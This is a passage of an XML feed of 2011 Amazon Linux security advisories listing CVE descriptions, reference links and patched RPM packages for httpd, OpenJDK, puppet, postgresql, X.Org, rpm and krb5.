</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3348" title="" id="CVE-2011-3348" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3368" title="" id="CVE-2011-3368" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2011:1391.html" title="" id="RHSA-2011:1391" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="httpd-devel" version="2.2.21" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-devel-2.2.21-1.19.amzn1.i686.rpm</filename></package><package name="httpd-tools" version="2.2.21" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-tools-2.2.21-1.19.amzn1.i686.rpm</filename></package><package name="httpd" version="2.2.21" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-2.2.21-1.19.amzn1.i686.rpm</filename></package><package name="mod_ssl" version="2.2.21" release="1.19.amzn1" epoch="1" arch="i686"><filename>Packages/mod_ssl-2.2.21-1.19.amzn1.i686.rpm</filename></package><package name="httpd-debuginfo" version="2.2.21" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-debuginfo-2.2.21-1.19.amzn1.i686.rpm</filename></package><package name="mod_ssl" version="2.2.21" release="1.19.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod_ssl-2.2.21-1.19.amzn1.x86_64.rpm</filename></package><package name="httpd-debuginfo" version="2.2.21" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-debuginfo-2.2.21-1.19.amzn1.x86_64.rpm</filename></package><package name="httpd-manual" version="2.2.21" release="1.19.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd-manual-2.2.21-1.19.amzn1.noarch.rpm</filename></package><package name="httpd-tools" version="2.2.21" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-tools-2.2.21-1.19.amzn1.x86_64.rpm</filename></package><package name="httpd-devel" version="2.2.21" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-devel-2.2.21-1.19.amzn1.x86_64.rpm</filename></package><package name="httpd" version="2.2.21" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-2.2.21-1.19.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2011-10</id><title>Amazon Linux - ALAS-2011-10: critical priority package update for java-1.6.0-openjdk</title><issued date="2011-10-31 18:22:00" /><updated date="2014-09-14 14:26:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-3560:
Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7, 6 Update 27 and earlier, 5.0 Update 31 and earlier, and 1.4.2_33 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality and integrity, related to JSSE.
It was found that HttpsURLConnection did not perform SecurityManager checks in the setSSLSocketFactory method. An untrusted Java application or applet running in a sandbox could use this flaw to bypass connection restrictions defined in the policy.
CVE-2011-3558:
Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7, 6 Update 27 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality via unknown vectors related to HotSpot.
A flaw was found in the Java HotSpot virtual machine. An untrusted Java application or applet could use this flaw to disclose portions of the VM memory, or cause it to crash.
CVE-2011-3557:
Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7, 6 Update 27 and earlier, 5.0 Update 31 and earlier, 1.4.2_33 and earlier, and JRockit R28.1.4 and earlier allows remote attackers to affect confidentiality, integrity, and availability, related to RMI.
A flaw was found in the Java RMI registry implementation. A remote RMI client could use this flaw to execute code on the RMI server with unrestricted privileges.
CVE-2011-3556:
Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7, 6 Update 27 and earlier, 5.0 Update 31 and earlier, 1.4.2_33 and earlier, and JRockit R28.1.4 and earlier allows remote attackers to affect confidentiality, integrity, and availability, related to RMI.
A flaw was found in the Java RMI (Remote Method Invocation) registry implementation. A remote RMI client could use this flaw to execute arbitrary code on the RMI server running the registry.
CVE-2011-3554:
Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7, 6 Update 27 and earlier, 5.0 Update 31 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors.
An insufficient error checking flaw was found in the unpacker for JAR files in pack200 format. A specially-crafted JAR file could use this flaw to crash the Java Virtual Machine (JVM) or, possibly, execute arbitrary code with JVM privileges.
CVE-2011-3553:
Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7, 6 Update 27 and earlier, and JRockit R28.1.4 and earlier allows remote authenticated users to affect confidentiality, related to JAXWS.
The Java API for XML Web Services (JAX-WS) implementation in OpenJDK was configured to include the stack trace in error messages sent to clients. A remote client could possibly use this flaw to obtain sensitive information.
CVE-2011-3552:
Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7, 6 Update 27 and earlier, 5.0 Update 31 and earlier, and 1.4.2_33 and earlier allows remote attackers to affect integrity via unknown vectors related to Networking.
It was found that Java applications running with SecurityManager restrictions were allowed to use too many UDP sockets by default. If multiple instances of a malicious application were started at the same time, they could exhaust all available UDP sockets on the system.
CVE-2011-3551:
Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7, 6 Update 27 and earlier, and JRockit R28.1.4 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to 2D.
An integer overflow flaw, leading to a heap-based buffer overflow, was found in the Java2D code used to perform transformations of graphic shapes and images. An untrusted Java application or applet running in a sandbox could use this flaw to bypass sandbox restrictions.
CVE-2011-3548:
Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7, 6 Update 27 and earlier, 5.0 Update 31 and earlier, and 1.4.2_33 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability, related to AWT.
A flaw was found in the AWTKeyStroke implementation. An untrusted Java application or applet running in a sandbox could use this flaw to bypass sandbox restrictions.
CVE-2011-3547:
Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7, 6 Update 27 and earlier, 5.0 Update 31 and earlier, and 1.4.2_33 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality via unknown vectors related to Networking.
An information leak flaw was found in the InputStream.skip implementation. An untrusted Java application or applet could possibly use this flaw to obtain bytes skipped by other threads.
CVE-2011-3544:
Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7 and 6 Update 27 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Scripting.
It was found that the Java ScriptingEngine did not properly restrict the privileges of sandboxed applications. An untrusted Java application or applet running in a sandbox could use this flaw to bypass sandbox restrictions.
CVE-2011-3521:
Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE, 7, 6 Update 27 and earlier, and 5.0 Update 31 earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Deserialization.
A flaw was found in the IIOP (Internet Inter-Orb Protocol) deserialization code. An untrusted Java application or applet running in a sandbox could use this flaw to bypass sandbox restrictions by deserializing specially-crafted input.
CVE-2011-3389:
This update fixes several vulnerabilities in the Sun Java 6 Runtime Environment and the Sun Java 6 Software Development Kit. Further information about these flaws can be found on the Oracle Java SE Critical Patch page, listed in the References section.
This update fixes several vulnerabilities in the IBM Java 6 Runtime Environment and the IBM Java 6 Software Development Kit. Detailed vulnerability descriptions are linked from the IBM "Security alerts" page, listed in the References section.
This update fixes several vulnerabilities in the IBM Java 2 Runtime Environment and the IBM Java 2 Software Development Kit. Detailed vulnerability descriptions are linked from the IBM "Security alerts" page, listed in the References section.
This update fixes several vulnerabilities in the IBM Java 1.4.2 Runtime Environment and the IBM Java 1.4.2 Software Development Kit. Detailed vulnerability descriptions are linked from the IBM "Security alerts" page, listed in the References section.
The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a "BEAST" attack.
A flaw was found in the way the SSL 3 and TLS 1.0 protocols used block ciphers in cipher-block chaining (CBC) mode. An attacker able to perform a chosen plain text attack against a connection mixing trusted and untrusted data could use this flaw to recover portions of the trusted data sent over the connection.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3389" title="" id="CVE-2011-3389" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3521" title="" id="CVE-2011-3521" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3544" title="" id="CVE-2011-3544" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3547" title="" id="CVE-2011-3547" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3548" title="" id="CVE-2011-3548" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3551" title="" id="CVE-2011-3551" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3552" title="" id="CVE-2011-3552" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3553" title="" id="CVE-2011-3553" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3554" title="" id="CVE-2011-3554" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3556" title="" id="CVE-2011-3556" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3557" title="" id="CVE-2011-3557" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3558" title="" id="CVE-2011-3558" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3560" title="" id="CVE-2011-3560" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2011:1380.html" title="" id="RHSA-2011:1380" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="java-1.6.0-openjdk-demo" version="1.6.0.0" release="52.1.9.10.40.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.0-52.1.9.10.40.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.0" release="52.1.9.10.40.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.0-52.1.9.10.40.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.0" release="52.1.9.10.40.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.0-52.1.9.10.40.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.0" release="52.1.9.10.40.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-1.6.0.0-52.1.9.10.40.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.0" release="52.1.9.10.40.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.0-52.1.9.10.40.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.0" release="52.1.9.10.40.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.0-52.1.9.10.40.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.0" release="52.1.9.10.40.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.0-52.1.9.10.40.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.0" release="52.1.9.10.40.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.0-52.1.9.10.40.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.0" release="52.1.9.10.40.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.0-52.1.9.10.40.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.0" release="52.1.9.10.40.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.0-52.1.9.10.40.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.0" release="52.1.9.10.40.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.0-52.1.9.10.40.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.0" release="52.1.9.10.40.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-1.6.0.0-52.1.9.10.40.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2011-11</id><title>Amazon Linux - ALAS-2011-11: medium priority package update for puppet</title><issued date="2011-10-31 18:22:00" /><updated date="2014-09-14 14:31:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-3871:
Puppet 2.7.x before 2.7.5, 2.6.x before 2.6.11, and 0.25.x, when running in --edit mode, uses a predictable file name, which allows local users to run arbitrary Puppet code or trick a user into editing arbitrary files.
CVE-2011-3870:
Puppet 2.7.x before 2.7.5, 2.6.x before 2.6.11, and 0.25.x allows local users to modify the permissions of arbitrary files via a symlink attack on the SSH authorized_keys file.
CVE-2011-3869:
Puppet 2.7.x before 2.7.5, 2.6.x before 2.6.11, and 0.25.x allows local users to overwrite arbitrary files via a symlink attack on the .k5login file.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3869" title="" id="CVE-2011-3869" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3870" title="" id="CVE-2011-3870" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3871" title="" id="CVE-2011-3871" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="puppet" version="2.6.6" release="3.2.amzn1" epoch="0" arch="i686"><filename>Packages/puppet-2.6.6-3.2.amzn1.i686.rpm</filename></package><package name="puppet-server" version="2.6.6" release="3.2.amzn1" epoch="0" arch="i686"><filename>Packages/puppet-server-2.6.6-3.2.amzn1.i686.rpm</filename></package><package name="puppet-debuginfo" version="2.6.6" release="3.2.amzn1" epoch="0" arch="i686"><filename>Packages/puppet-debuginfo-2.6.6-3.2.amzn1.i686.rpm</filename></package><package name="puppet-debuginfo" version="2.6.6" release="3.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/puppet-debuginfo-2.6.6-3.2.amzn1.x86_64.rpm</filename></package><package name="puppet" version="2.6.6" release="3.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/puppet-2.6.6-3.2.amzn1.x86_64.rpm</filename></package><package name="puppet-server" version="2.6.6" release="3.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/puppet-server-2.6.6-3.2.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2011-12</id><title>Amazon Linux - ALAS-2011-12: medium priority package update for postgresql</title><issued date="2011-10-31 18:24:00" /><updated date="2014-09-14 14:32:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-2483:
crypt_blowfish before 1.1, as used in PHP before 5.3.7 on certain platforms, PostgreSQL before 8.4.9, and other products, does not properly handle 8-bit characters, which makes it easier for context-dependent attackers to determine a cleartext password by leveraging knowledge of a password hash.
A signedness issue was found in the way the crypt() function in the PostgreSQL pgcrypto module handled 8-bit characters in passwords when using Blowfish hashing. Up to three characters immediately preceding a non-ASCII character (one with the high bit set) had no effect on the hash result, thus shortening the effective password length. This made brute-force guessing more efficient as several different passwords were hashed to the same value.
A signedness issue was found in the way the PHP crypt() function handled 8-bit characters in passwords when using Blowfish hashing. Up to three characters immediately preceding a non-ASCII character (one with the high bit set) had no effect on the hash result, thus shortening the effective password length. This made brute-force guessing more efficient as several different passwords were hashed to the same value.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2483" title="" id="CVE-2011-2483" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2011:1377.html" title="" id="RHSA-2011:1377" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="postgresql-plperl" version="8.4.9" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql-plperl-8.4.9-1.13.amzn1.i686.rpm</filename></package><package name="postgresql-libs" version="8.4.9" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql-libs-8.4.9-1.13.amzn1.i686.rpm</filename></package><package name="postgresql-devel" version="8.4.9" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql-devel-8.4.9-1.13.amzn1.i686.rpm</filename></package><package name="postgresql-docs" version="8.4.9" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql-docs-8.4.9-1.13.amzn1.i686.rpm</filename></package><package name="postgresql-contrib" version="8.4.9" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql-contrib-8.4.9-1.13.amzn1.i686.rpm</filename></package><package name="postgresql-pltcl" version="8.4.9" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql-pltcl-8.4.9-1.13.amzn1.i686.rpm</filename></package><package name="postgresql" version="8.4.9" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql-8.4.9-1.13.amzn1.i686.rpm</filename></package><package name="postgresql-server" version="8.4.9" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql-server-8.4.9-1.13.amzn1.i686.rpm</filename></package><package name="postgresql-plpython" version="8.4.9" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql-plpython-8.4.9-1.13.amzn1.i686.rpm</filename></package><package name="postgresql-debuginfo" version="8.4.9" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql-debuginfo-8.4.9-1.13.amzn1.i686.rpm</filename></package><package name="postgresql-test" version="8.4.9" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql-test-8.4.9-1.13.amzn1.i686.rpm</filename></package><package name="postgresql-pltcl" version="8.4.9" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql-pltcl-8.4.9-1.13.amzn1.x86_64.rpm</filename></package><package name="postgresql" version="8.4.9" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql-8.4.9-1.13.amzn1.x86_64.rpm</filename></package><package name="postgresql-plpython" version="8.4.9" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql-plpython-8.4.9-1.13.amzn1.x86_64.rpm</filename></package><package name="postgresql-docs" version="8.4.9" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql-docs-8.4.9-1.13.amzn1.x86_64.rpm</filename></package><package name="postgresql-contrib" version="8.4.9" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql-contrib-8.4.9-1.13.amzn1.x86_64.rpm</filename></package><package name="postgresql-plperl" version="8.4.9" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql-plperl-8.4.9-1.13.amzn1.x86_64.rpm</filename></package><package name="postgresql-devel" version="8.4.9" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql-devel-8.4.9-1.13.amzn1.x86_64.rpm</filename></package><package name="postgresql-server" version="8.4.9" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql-server-8.4.9-1.13.amzn1.x86_64.rpm</filename></package><package name="postgresql-libs" version="8.4.9" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql-libs-8.4.9-1.13.amzn1.x86_64.rpm</filename></package><package name="postgresql-test" version="8.4.9" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql-test-8.4.9-1.13.amzn1.x86_64.rpm</filename></package><package name="postgresql-debuginfo" version="8.4.9" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql-debuginfo-8.4.9-1.13.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2011-13</id><title>Amazon Linux - ALAS-2011-13: medium priority package update for xorg-x11-server</title><issued date="2011-10-31 18:25:00" /><updated date="2014-09-14 14:33:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2010-4819:
An input sanitization flaw was found in the X.Org Render extension. A malicious, authorized client could use this flaw to leak arbitrary memory from the X.Org server process, or possibly crash the X.Org server.
CVE-2010-4818:
Multiple input sanitization flaws were found in the X.Org GLX (OpenGL extension to the X Window System) extension. A malicious, authorized client could use these flaws to crash the X.Org server or, potentially, execute arbitrary code with root privileges.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4818" title="" id="CVE-2010-4818" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4819" title="" id="CVE-2010-4819" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2011:1359.html" title="" id="RHSA-2011:1359" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="xorg-x11-server-Xvfb" version="1.7.7" release="29.10.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xvfb-1.7.7-29.10.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xephyr" version="1.7.7" release="29.10.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xephyr-1.7.7-29.10.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-common" version="1.7.7" release="29.10.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-common-1.7.7-29.10.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xnest" version="1.7.7" release="29.10.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xnest-1.7.7-29.10.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-debuginfo" version="1.7.7" release="29.10.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-debuginfo-1.7.7-29.10.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xvfb" version="1.7.7" release="29.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xvfb-1.7.7-29.10.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-debuginfo" version="1.7.7" release="29.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-debuginfo-1.7.7-29.10.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xnest" version="1.7.7" release="29.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xnest-1.7.7-29.10.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-common" version="1.7.7" release="29.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-common-1.7.7-29.10.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-source" version="1.7.7" release="29.10.amzn1" epoch="0" arch="noarch"><filename>Packages/xorg-x11-server-source-1.7.7-29.10.amzn1.noarch.rpm</filename></package><package name="xorg-x11-server-Xephyr" version="1.7.7" release="29.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xephyr-1.7.7-29.10.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2011-14</id><title>Amazon Linux - ALAS-2011-14: medium priority package update for rpm</title><issued date="2011-10-31 18:25:00" /><updated date="2014-09-14 14:33:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-3378:
RPM 4.4.x through 4.9.x, probably before 4.9.1.2, allows remote attackers to cause a denial of service (memory corruption) and possibly execute arbitrary code via an rpm package with crafted headers and offsets that are not properly handled when a package is queried or installed, related to (1) the regionSwab function, (2) the headerLoad function, and (3) multiple functions in rpmio/rpmpgp.c.
Multiple flaws were found in the way the RPM library parsed package headers. An attacker could create a specially-crafted RPM package that, when queried or installed, would cause rpm to crash or, potentially, execute arbitrary code.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3378" title="" id="CVE-2011-3378" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2011:1349.html" title="" id="RHSA-2011:1349" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="rpm-devel" version="4.8.0" release="16.36.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-devel-4.8.0-16.36.amzn1.i686.rpm</filename></package><package name="rpm-libs" version="4.8.0" release="16.36.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-libs-4.8.0-16.36.amzn1.i686.rpm</filename></package><package name="rpm-apidocs" version="4.8.0" release="16.36.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-apidocs-4.8.0-16.36.amzn1.i686.rpm</filename></package><package name="rpm" version="4.8.0" release="16.36.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-4.8.0-16.36.amzn1.i686.rpm</filename></package><package name="rpm-python" version="4.8.0" release="16.36.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-python-4.8.0-16.36.amzn1.i686.rpm</filename></package><package name="rpm-cron" version="4.8.0" release="16.36.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-cron-4.8.0-16.36.amzn1.i686.rpm</filename></package><package name="rpm-build" version="4.8.0" release="16.36.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-build-4.8.0-16.36.amzn1.i686.rpm</filename></package><package name="rpm-debuginfo" version="4.8.0" release="16.36.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-debuginfo-4.8.0-16.36.amzn1.i686.rpm</filename></package><package name="rpm-devel" version="4.8.0" release="16.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-devel-4.8.0-16.36.amzn1.x86_64.rpm</filename></package><package name="rpm-python" version="4.8.0" release="16.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-python-4.8.0-16.36.amzn1.x86_64.rpm</filename></package><package name="rpm-debuginfo" version="4.8.0" release="16.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-debuginfo-4.8.0-16.36.amzn1.x86_64.rpm</filename></package><package name="rpm-libs" version="4.8.0" release="16.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-libs-4.8.0-16.36.amzn1.x86_64.rpm</filename></package><package name="rpm-apidocs" version="4.8.0" release="16.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-apidocs-4.8.0-16.36.amzn1.x86_64.rpm</filename></package><package name="rpm" version="4.8.0" release="16.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-4.8.0-16.36.amzn1.x86_64.rpm</filename></package><package name="rpm-build" version="4.8.0" release="16.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-build-4.8.0-16.36.amzn1.x86_64.rpm</filename></package><package name="rpm-cron" version="4.8.0" release="16.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-cron-4.8.0-16.36.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2011-15</id><title>Amazon Linux - ALAS-2011-15: medium priority package update for krb5</title><issued date="2011-10-31 18:26:00" /><updated date="2014-09-14 14:34:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-1527:
The kdb_ldap plugin in the Key Distribution Center (KDC) in MIT Kerberos 5 (aka krb5) 1.9 through 1.9.1, when the LDAP back end is used, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a kinit operation with incorrect string case for the realm, related to the is_principal_in_realm, krb5_set_error_message, krb5_ldap_get_principal, and process_as_req functions.
Multiple NULL pointer dereference and assertion failure flaws were found in the MIT Kerberos KDC when it was configured to use an LDAP (Lightweight Directory Access Protocol) or Berkeley Database (Berkeley DB) back end. A remote attacker could use these flaws to crash the KDC.
